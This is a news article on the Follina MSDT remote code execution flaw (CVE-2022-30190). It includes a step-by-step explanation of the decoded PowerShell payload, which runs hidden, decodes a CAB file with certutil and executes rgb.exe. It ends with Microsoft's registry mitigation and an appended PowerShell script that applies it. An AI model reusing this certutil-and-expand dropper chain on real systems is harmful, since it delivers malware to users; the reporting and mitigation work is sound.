Windows Critical Zero-Day Vulnerability: "Follina"

The Microsoft Windows Support Diagnostic Tool (MSDT) is affected by a high-risk zero-day vulnerability, codenamed "Follina", that can be used to execute code remotely on Windows systems.

The vulnerability was first discovered and reported to Microsoft in April by researchers at the Shadow Chaser Group, who also showed that it was already being exploited by attackers. The researchers said Microsoft initially flagged the report as "not a security-related issue", but later closed the bug report citing a remote code execution vulnerability. As a result, this long-known vulnerability was only recently assigned the identifier CVE-2022-30190.

Microsoft describes the vulnerability as follows:

"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application. The attacker could then install the program, view, change or delete the data, or create a new account in the context permitted by the user's permissions."

According to researcher Kevin Beaumont's analysis, the document carrying the attack uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands. In theory this should not be possible, but in practice it works. Decoded, the commands in the document read:

$cmd = "c:\Windows\system32\cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

What the script does is as follows. Running in a hidden window, it will:

1. Terminate msdt.exe if it is running
2. Loop through the files in the RAR archive looking for the Base64 string that encodes a CAB file
3. Store this Base64-encoded CAB file as 1.t
4. Decode the Base64-encoded CAB file and save it as 1.c
5. Expand the 1.c CAB file into the current directory, and finally:
6. Execute rgb.exe (probably packed inside the 1.c CAB file)

Microsoft has not yet released a patch for this vulnerability, but it has published a mitigation that disables the MSDT URL protocol:

1. Run command prompt as administrator
2. To backup registry keys, execute command "reg export HKEY_CLASSES_ROOT\ms-msdt filename"
3. Execute command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f"
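The three mitigation steps above, wrapped in a PowerShell script that checks for elevation, refuses to delete the key unless the backup succeeded, and verifies the handler is gone afterwards. This is an added example, not Microsoft's or the article's own code; the backup path C:\ProgramData\ms-msdt-backup.reg is an assumption and can be changed.

```powershell
# Added example: apply and verify the ms-msdt URL protocol mitigation.
# Run from an elevated PowerShell session (step 1 of the article).

$Key        = 'HKEY_CLASSES_ROOT\ms-msdt'
$BackupFile = 'C:\ProgramData\ms-msdt-backup.reg'   # assumed location, adjust as needed

function Test-IsElevated {
    # The reg export/delete on HKEY_CLASSES_ROOT needs administrator rights.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Test-MsdtHandlerPresent {
    # $true while the ms-msdt: protocol handler is still registered.
    return Test-Path -Path 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
}

function Invoke-MsdtMitigation {
    if (-not (Test-IsElevated)) { throw 'Run this script from an elevated (administrator) session.' }

    if (-not (Test-MsdtHandlerPresent)) {
        Write-Host 'ms-msdt handler is already absent; nothing to do.'
        return
    }

    # Step 2: back up the key so it can be restored once a patch is installed.
    & reg.exe export $Key $BackupFile /y
    if ($LASTEXITCODE -ne 0 -or -not (Test-Path $BackupFile)) {
        throw "Backup failed (exit code $LASTEXITCODE); leaving the key in place."
    }

    # Step 3: remove the protocol handler.
    & reg.exe delete $Key /f
    if ($LASTEXITCODE -ne 0) { throw "Delete failed (exit code $LASTEXITCODE)." }

    # Verify the mitigation actually took effect.
    if (Test-MsdtHandlerPresent) { throw 'ms-msdt key is still present after delete.' }
    Write-Host "Mitigation applied. Restore later with: reg import $BackupFile"
}

Invoke-MsdtMitigation
```

Restoring the key after patching is the reverse of step 2: reg import on the backup file written above.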


Origin www.oschina.net/news/198181/windows-msdt-zero-day-now-exploited